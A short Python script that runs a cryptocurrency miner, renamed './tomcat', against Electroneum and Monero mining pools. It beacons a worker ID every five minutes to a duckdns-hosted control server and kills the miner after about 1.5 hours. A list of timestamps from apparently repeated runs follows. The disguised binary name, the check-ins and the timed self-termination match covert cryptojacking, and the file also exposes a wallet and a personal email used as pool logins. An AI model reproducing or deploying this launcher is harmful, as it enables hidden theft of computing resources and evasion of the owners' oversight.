import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:21:03.310807
#2018-02-17 17:08:01.853592
#2018-02-17 18:56:05.103655
#2018-02-17 20:36:06.738805
#2018-02-17 22:22:06.758613
#2018-02-18 00:06:07.579778
#2018-02-18 01:57:06.650113
#2018-02-18 03:45:07.845930
#2018-02-18 05:33:03.781738
#2018-02-18 07:26:07.436134
#2018-02-18 09:13:03.992032
#2018-02-18 10:59:04.085835
#2018-02-18 12:46:07.712682
#2018-02-18 14:32:06.420338
#2018-02-18 16:23:01.336315
#2018-02-18 18:12:06.669746
#2018-02-18 19:58:04.059268
#2018-02-18 21:45:07.720433
#2018-02-18 23:34:05.129712
#2018-02-19 01:20:07.261903
#2018-02-19 03:08:02.101229
#2018-02-19 04:53:06.302634
#2018-02-19 06:39:05.289037
#2018-02-19 08:29:04.415334
#2018-02-19 10:18:08.677989
#2018-02-19 12:06:04.756052
#2018-02-19 13:54:02.008483
#2018-02-19 15:43:02.108249
#2018-02-19 17:33:01.542514
#2018-02-19 19:19:02.080628
#2018-02-19 21:07:01.546158
#2018-02-19 22:54:01.286555
#2018-02-20 00:37:05.220859
#2018-02-20 02:26:05.572220
#2018-02-20 04:16:05.521518
#2018-02-20 05:59:01.644573
#2018-02-20 07:45:09.132457
#2018-02-20 09:32:06.014608
#2018-02-20 11:16:06.966894
#2018-02-20 13:03:04.319720
#2018-02-20 14:46:07.892840
#2018-02-20 16:33:02.179308
#2018-02-20 18:19:04.446547
#2018-02-20 20:10:10.761852
#2018-02-20 21:57:07.515146
#2018-02-20 23:39:07.099191
#2018-02-21 01:25:09.285700
#2018-02-21 03:14:06.953342
#2018-02-21 05:03:05.800562
#2018-02-21 06:51:01.439012
#2018-02-21 08:37:01.787739
#2018-02-21 10:22:07.745682
#2018-02-21 12:10:09.667107
#2018-02-21 14:00:09.305235
#2018-02-21 15:46:05.432532
#2018-02-21 17:38:09.018395
#2018-02-21 19:25:08.128294
#2018-02-21 21:15:10.452212
#2018-02-21 23:03:02.236777
#2018-02-22 00:52:06.946569
#2018-02-22 02:39:06.552486
#2018-02-22 04:24:05.715492
#2018-02-22 06:09:01.958635
#2018-02-22 07:54:01.863192
#2018-02-22 09:44:02.220189
#2018-02-22 11:29:08.072205
#2018-02-22 13:16:01.861490
#2018-02-22 15:05:05.264638
#2018-02-22 16:50:06.835046
#2018-02-22 18:38:01.507975
#2018-02-22 20:29:01.659313
#2018-02-22 22:14:01.549247
#2018-02-23 00:02:01.778660
#2018-02-23 01:51:06.582338
#2018-02-23 03:39:05.252347
#2018-02-23 05:24:01.983893
#2018-02-23 07:09:07.295577
#2018-02-23 08:59:05.996435
#2018-02-23 11:03:07.052387
#2018-02-23 12:59:07.126658
#2018-02-23 14:45:05.704586
#2018-02-23 16:35:10.751797
#2018-02-23 18:21:08.487124
#2018-02-23 20:06:01.694770
#2018-02-23 21:52:04.787182
#2018-02-23 23:43:04.814802
#2018-02-24 01:34:05.713109
#2018-02-24 03:23:07.546056
#2018-02-24 05:08:08.218870
#2018-02-24 06:58:03.582978
#2018-02-24 08:48:04.872703
#2018-02-24 10:49:06.438209
#2018-02-24 12:36:01.243377
#2018-02-24 14:24:07.714242
#2018-02-24 16:12:06.641881
#2018-02-24 18:04:05.951624
#2018-02-24 19:51:06.326525
#2018-02-24 21:36:01.787377
#2018-02-25 01:50:07.555979
#2018-02-25 04:51:07.380560
#2018-02-25 08:13:05.409098